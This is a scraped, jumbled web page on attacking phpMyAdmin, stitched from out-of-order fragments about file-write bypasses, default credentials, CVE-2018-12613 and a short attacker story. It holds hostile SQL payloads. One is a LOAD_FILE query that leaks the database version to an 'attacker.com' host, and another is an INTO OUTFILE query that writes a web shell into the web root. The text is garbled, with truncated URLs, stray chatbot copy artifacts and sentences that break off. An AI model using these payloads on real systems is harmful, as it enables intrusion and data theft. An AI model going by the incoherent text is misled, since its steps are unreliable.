Phpmyadmin Hacktricks Verified _verified_ | 360p |
If the secure_file_priv variable is set to NULL, you cannot directly export files. However, you can bypass this by using the MySQL general log. The technique involves:
If OUTFILE is blocked directly, create a table, insert the shell, and then export it. B. Log File Manipulation
phpMyAdmin supports several authentication modes, which are configured in the config.inc.php file. Weak configurations drastically increase the risk of unauthorized access. Default Credentials
Inspect the HTML source code of the login page. Meta tags, scripts, or commented code frequently expose version strings. Configuration Auditing
phpMyAdmin simplifies database administration, but its accessibility often makes it a "crown jewel" for attackers. When verified through the lens of HackTricks, the security of this tool is not just about patching software, but about understanding the intersection of configuration, authentication, and server-side vulnerabilities. Common Vectors of Exploitation phpmyadmin hacktricks verified
Following the verified steps, Silas crafted a specific URL payload: ://target.com
: Regularly update phpMyAdmin to ensure you have the latest security patches.
Requires FILE privilege and appropriate OS permissions (e.g., MySQL running as root, or weak directory permissions).
: The MySQL user must have the FILE privilege and the secure_file_priv global variable must be empty. Payload Example : If the secure_file_priv variable is set to NULL,
SELECT LOAD_FILE(CONCAT('\\\\', (SELECT @@version), '.attacker.com\\share\\test'));
SELECT '' INTO OUTFILE '/var/www/html/shell.php'; Use code with caution.
Requires MySQL SUPER privilege (often given to root user in phpMyAdmin).
Check index.php or README files for specific version numbers. 2. Common phpMyAdmin Vulnerabilities (Verified) CVE-2018-12613: RCE via Local File Inclusion (LFI) Default Credentials Inspect the HTML source code of
Before exploiting, you must find the interface. phpMyAdmin paths are predictable.
Ensure you are using the latest version to patch CVE-2018-12613 and others.
Instead of a complex exploit, the attacker uses a simple SQL query to "tell" the server to create a file. This is the Select Into Outfile technique. "" '/var/www/html/shell.php' Use code with caution. Copied to clipboard In an instant, the attacker has written a PHP Web Shell directly into the website's folder. 4. Full System Access The story ends when the attacker visits ://website.com . The server responds with
SELECT '' INTO OUTFILE '/var/www/html/shell.php'; Use code with caution.
